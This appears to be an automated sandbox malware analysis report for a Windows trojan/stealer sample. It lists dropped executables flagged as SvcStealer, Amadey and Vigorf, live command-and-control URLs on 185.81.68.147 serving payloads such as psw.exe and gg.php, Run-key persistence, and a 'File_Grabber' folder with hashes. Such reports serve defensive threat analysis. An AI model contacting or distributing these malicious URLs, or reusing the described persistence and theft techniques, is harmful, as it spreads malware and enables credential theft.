      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\libcrypto-1_1.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\libffi-7.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\python38.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\select.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\ucrtbase.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI3442\unicodedata.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\tmp1946.exe53%ReversingLabsWin64.Hacktool.SvcStealer
      C:\Users\user\AppData\Local\Temp\tmp8AEF.exe26%ReversingLabsWin64.Trojan.Amadey
      C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exe66%ReversingLabsWin64.Trojan.Vigorf

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://185.81.68.147/psw.exe100%Avira URL Cloudphishing
      http://crl.mic:0%Avira URL Cloudsafe
      http://185.81.68.147/data.php100%Avira URL Cloudphishing
      http://185.81.68.147/gg.php100%Avira URL Cloudphishing
      http://www.winimage.com/zLibDll1.3.1-wbr0%Avira URL Cloudsafe
      http://185.81.68.147/zx.exe100%Avira URL Cloudphishing
      http://185.81.68.147/TT.exe100%Avira URL Cloudmalware
      http://185.81.68.147/psw.exeDiamotrixGDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==DiamotrixGDUFBBwXHRscGDUtAg100%Avira URL Cloudphishing
      http://185.81.68.147/gg.phptmUP100%Avira URL Cloudphishing
      http://185.81.68.147/gg.phpdb100%Avira URL Cloudphishing
      http://185.81.68.147/gg.phpReflectiveLoader100%Avira URL Cloudphishing

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://185.81.68.147/zx.exetrue
      • Avira URL Cloud: phishing
      		unknown
      http://185.81.68.147/data.phptrue
      • Avira URL Cloud: phishing
      		unknown
      http://185.81.68.147/gg.phptrue
      • Avira URL Cloud: phishing
      		unknown
      http://185.81.68.147/TT.exetrue
      • Avira URL Cloud: malware
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688tmp8AEF.exe, 00000009.00000002.2284008198.000002E4BB870000.00000004.00001000.00020000.00000000.sdmpfalse
        		high
        https://word.office.comonexplorer.exe, 00000003.00000002.3343563900.00000000099BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094406378.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2113623641.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
          		high
          http://python.org/dev/peps/pep-0263/tmp8AEF.exe, 00000009.00000002.2285358677.00007FF8A8DFD000.00000002.00000001.01000000.0000000A.sdmpfalse
            		high
            http://www.autoitscript.com/autoAexplorer.exe, 00000003.00000000.2118670983.000000000C891000.00000004.00000001.00020000.00000000.sdmpfalse
              		high
              http://185.81.68.147/psw.exeDiamotrixGDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==DiamotrixGDUFBBwXHRscGDUtAgtmp1946.exe, 0000000B.00000000.2285738075.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe, 0000000B.00000002.2550694420.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe.2.drfalse
              • Avira URL Cloud: phishing
              		unknown
              https://curl.se/docs/http-cookies.htmltmp1946.exe, tmp1946.exe, 0000000B.00000000.2285738075.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe, 0000000B.00000002.2550694420.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe.2.drfalse
                		high
                http://ocsp.thawte.com0tmp8AEF.exe, 00000006.00000003.2247517207.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258958415.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248074256.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247931359.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258237059.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248288112.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247713343.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.6.dr, _ctypes.pyd.6.dr, libffi-7.dll.6.dr, select.pyd.6.dr, _lzma.pyd.6.dr, unicodedata.pyd.6.drfalse
                  		high
                  https://powerpoint.office.comcemberexplorer.exe, 00000003.00000002.3349111862.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2117173710.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                    		high
                    https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readertmp8AEF.exe, 00000009.00000003.2281953921.000002E4B9BC0000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000002.2283820341.000002E4B9C57000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000003.2282844715.000002E4B9BE0000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000002.2283743849.000002E4B9BE1000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000003.2282767428.000002E4B9C54000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://crl.mictmp8AEF.exe, 00000006.00000003.2247224120.0000024B41D40000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.81.68.147/psw.exetmp1946.exe, tmp1946.exe, 0000000B.00000002.2550280470.000001DEDDCEC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        		unknown
                        http://www.autoitscript.com/autoexplorer.exe, 00000003.00000003.2691930896.000000000C8ED000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          https://curl.se/docs/alt-svc.htmltmp1946.exe, tmp1946.exe, 0000000B.00000000.2285738075.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe, 0000000B.00000002.2550694420.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe.2.drfalse
                            		high
                            https://excel.office.comexplorer.exe, 00000003.00000003.3094406378.0000000009B7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2113623641.0000000009B7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3343563900.0000000009B7C000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#tmp8AEF.exe, 00000009.00000003.2281953921.000002E4B9BC0000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000002.2283820341.000002E4B9C57000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000003.2282844715.000002E4B9BE0000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000002.2283743849.000002E4B9BE1000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000003.2282767428.000002E4B9C54000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.microexplorer.exe, 00000003.00000002.3342356971.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2112187028.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2112881693.0000000008890000.00000002.00000001.00040000.00000000.sdmpfalse
                                  		high
                                  http://www.python.org/download/releases/2.3/mro/.tmp8AEF.exe, 00000009.00000003.2280679574.000002E4B9C74000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000003.2280711426.000002E4B9C68000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000002.2284411794.000002E4BBBB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    https://outlook.comexplorer.exe, 00000003.00000003.3094406378.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2113623641.0000000009B7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3343563900.0000000009B7C000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sytmp8AEF.exe, 00000009.00000003.2281953921.000002E4B9BC0000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000002.2283820341.000002E4B9C57000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000003.2282844715.000002E4B9BE0000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000002.2283743849.000002E4B9BE1000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000003.2282767428.000002E4B9C54000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://curl.se/docs/hsts.htmltmp1946.exe, tmp1946.exe, 0000000B.00000000.2285738075.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe, 0000000B.00000002.2550694420.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe.2.drfalse
                                          		high
                                          http://crl.mic:tmp8AEF.exe, 00000006.00000003.2247224120.0000024B41D40000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://curl.se/docs/alt-svc.html#tmp1946.exefalse
                                            		high
                                            http://185.81.68.147/gg.phptmUPtmp1946.exe, 0000000B.00000002.2550280470.000001DEDDCEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: phishing
                                            		unknown
                                            http://crl.thawte.com/ThawteTimestampingCA.crl0tmp8AEF.exe, 00000006.00000003.2247517207.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258958415.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248074256.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247931359.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258237059.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248288112.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247713343.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.6.dr, _ctypes.pyd.6.dr, libffi-7.dll.6.dr, select.pyd.6.dr, _lzma.pyd.6.dr, unicodedata.pyd.6.drfalse
                                              		high
                                              https://curl.se/docs/hsts.html#tmp1946.exefalse
                                                		high
                                                https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000000.2106502490.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3339715609.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.winimage.com/zLibDlltmp1946.exe, 0000000B.00000000.2285738075.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe, 0000000B.00000002.2550694420.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe.2.drfalse
                                                    		high
                                                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000003.00000000.2117173710.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096617863.000000000C547000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3349612496.000000000C54A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.msn.com/explorer.exe, 00000003.00000000.2113623641.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094406378.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3343563900.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://curl.se/docs/http-cookies.html#tmp1946.exefalse
                                                          		high
                                                          http://www.python.org/dev/peps/pep-0205/tmp8AEF.exe, 00000006.00000003.2255370339.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000003.2281772785.000002E4B9C70000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000002.2283914554.000002E4B9C7C000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000003.2282198812.000002E4B9C73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://185.81.68.147/gg.phpdbtmp1946.exe, 0000000B.00000002.2550280470.000001DEDDCEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: phishing
                                                            		unknown
                                                            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pytmp8AEF.exe, 00000009.00000003.2282767428.000002E4B9C54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://crl.vexplorer.exe, 00000003.00000002.3335969864.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2103838610.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.winimage.com/zLibDll1.3.1-wbrtmp1946.exe, 0000000B.00000000.2285738075.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe, 0000000B.00000002.2550694420.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe.2.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://185.81.68.147/gg.phpReflectiveLoadertmp1946.exe, 0000000B.00000000.2285738075.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe, 0000000B.00000002.2550694420.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe.2.drfalse
                                                                • Avira URL Cloud: phishing
                                                                		unknown
                                                                https://wns.windows.com/)sexplorer.exe, 00000003.00000002.3343563900.00000000099BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094406378.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2113623641.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  185.81.68.147
                                                                  		unknownFinland
                                                                  		50108KLNOPT-ASFItrue

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1580849
                                                                  Start date and time:2024-12-26 12:04:05 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 11m 31s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:12
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:1
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:52kYJGCon6.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:f5c5c9d5a779ad7077cca7bef57e94f0.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@17/97@0/1
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 69%
                                                                  • Number of executed functions: 129
                                                                  • Number of non-executed functions: 301
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  06:05:00API Interceptor722886x Sleep call for process: svchost.exe modified
                                                                  06:05:01API Interceptor232724x Sleep call for process: explorer.exe modified
                                                                  12:04:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exe
                                                                  12:05:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exe

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  185.81.68.147CwQQqCmqkY.exeGet hashmaliciousMicroClipBrowse
                                                                  • 185.81.68.147/gg.php
                                                                  uFVgJVXaEU.exeGet hashmaliciousRedLineBrowse
                                                                  • 185.81.68.147/VzCAHn.php?2F409E82DCA61388941053
                                                                  m5804Te9Uw.exeGet hashmaliciousRedLineBrowse
                                                                  • 185.81.68.147/VzCAHn.php?443320E440F81953448019
                                                                  3Qv3xyyL5G.exeGet hashmaliciousRedLineBrowse
                                                                  • 185.81.68.147/VzCAHn.php?65D35BAB97073674480464
                                                                  K6qneGSDSB.exeGet hashmaliciousBabadeda, RedLineBrowse
                                                                  • 185.81.68.147/VzCAHn.php?616766F8886C145454191
                                                                  file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                  • 185.81.68.147/tizhyf/gate.php?232B06DEE822786254513
                                                                  mggoBrtk9t.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                  • 185.81.68.147/7vhfjke3/index.php
                                                                  D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                  • 185.81.68.147/7vhfjke3/index.php
                                                                  D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                  • 185.81.68.147/7vhfjke3/index.php
                                                                  hoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
                                                                  • 185.81.68.147/7vhfjke3/index.php?wal=1

                                                                  Domains

                                                                  No context

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  KLNOPT-ASFICwQQqCmqkY.exeGet hashmaliciousMicroClipBrowse
                                                                  • 185.81.68.147
                                                                  uFVgJVXaEU.exeGet hashmaliciousRedLineBrowse
                                                                  • 185.81.68.147
                                                                  m5804Te9Uw.exeGet hashmaliciousRedLineBrowse
                                                                  • 185.81.68.147
                                                                  3Qv3xyyL5G.exeGet hashmaliciousRedLineBrowse
                                                                  • 185.81.68.147
                                                                  K6qneGSDSB.exeGet hashmaliciousBabadeda, RedLineBrowse
                                                                  • 185.81.68.147
                                                                  file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                  • 185.81.68.147
                                                                  mggoBrtk9t.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                  • 185.81.68.148
                                                                  D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                  • 185.81.68.148
                                                                  D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                  • 185.81.68.148
                                                                  hoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
                                                                  • 185.81.68.148

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Users\user\AppData\Local\Temp\_MEI3442\VCRUNTIME140.dllDeltaX.exeGet hashmaliciousUnknownBrowse
                                                                    zapret.exeGet hashmaliciousUnknownBrowse
                                                                      uFVgJVXaEU.exeGet hashmaliciousRedLineBrowse
                                                                        m5804Te9Uw.exeGet hashmaliciousRedLineBrowse
                                                                          zapret.exeGet hashmaliciousUnknownBrowse
                                                                            3Qv3xyyL5G.exeGet hashmaliciousRedLineBrowse
                                                                              K6qneGSDSB.exeGet hashmaliciousBabadeda, RedLineBrowse
                                                                                oKfMLwqaRZ.exeGet hashmaliciousUnknownBrowse
                                                                                  mggoBrtk9t.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                    yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\0.1.filtertrie.intermediate.txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):5
                                                                                      Entropy (8bit):2.321928094887362
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Dy:W
                                                                                      MD5:34BD1DFB9F72CF4F86E6DF6DA0A9E49A
                                                                                      SHA1:5F96D66F33C81C0B10DF2128D3860E3CB7E89563
                                                                                      SHA-256:8E1E6A3D56796A245D0C7B0849548932FEE803BBDB03F6E289495830E017F14C
                                                                                      SHA-512:E3787DE7C4BC70CA62234D9A4CDC6BD665BFFA66DEBE3851EE3E8E49E7498B9F1CBC01294BF5E9F75DE13FB78D05879E82FA4B89EE45623FE5BF7AC7E48EDA96
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview:0.1..

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\0.2.filtertrie.intermediate.txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):5
                                                                                      Entropy (8bit):2.321928094887362
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Ay:Ay
                                                                                      MD5:C204E9FAAF8565AD333828BEFF2D786E
                                                                                      SHA1:7D23864F5E2A12C1A5F93B555D2D3E7C8F78EEC1
                                                                                      SHA-256:D65B6A3BF11A27A1CED1F7E98082246E40CF01289FD47FE4A5ED46C221F2F73F
                                                                                      SHA-512:E72F4F79A4AE2E5E40A41B322BC0408A6DEC282F90E01E0A8AAEDF9FB9D6F04A60F45A844595727539C1643328E9C1B989B90785271CC30A6550BBDA6B1909F8
                                                                                      Malicious:false
                                                                                      Preview:0.2..

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\1-7FeatureCache.txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):764
                                                                                      Entropy (8bit):2.71278771083604
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:YIrxA3rOpKmA4RP7EcJBSiGl6s8A6yZn2KKrn2U3QPZRpX5Cwo5WHWn:YIrcSpKmNRwcfHGF8AJp9WtAZRJ5poI2
                                                                                      MD5:3E059D830158FF4A28F904D1CF0DBE84
                                                                                      SHA1:B5FC22017FA5BBE4728A93CFC27F8300EEAE310F
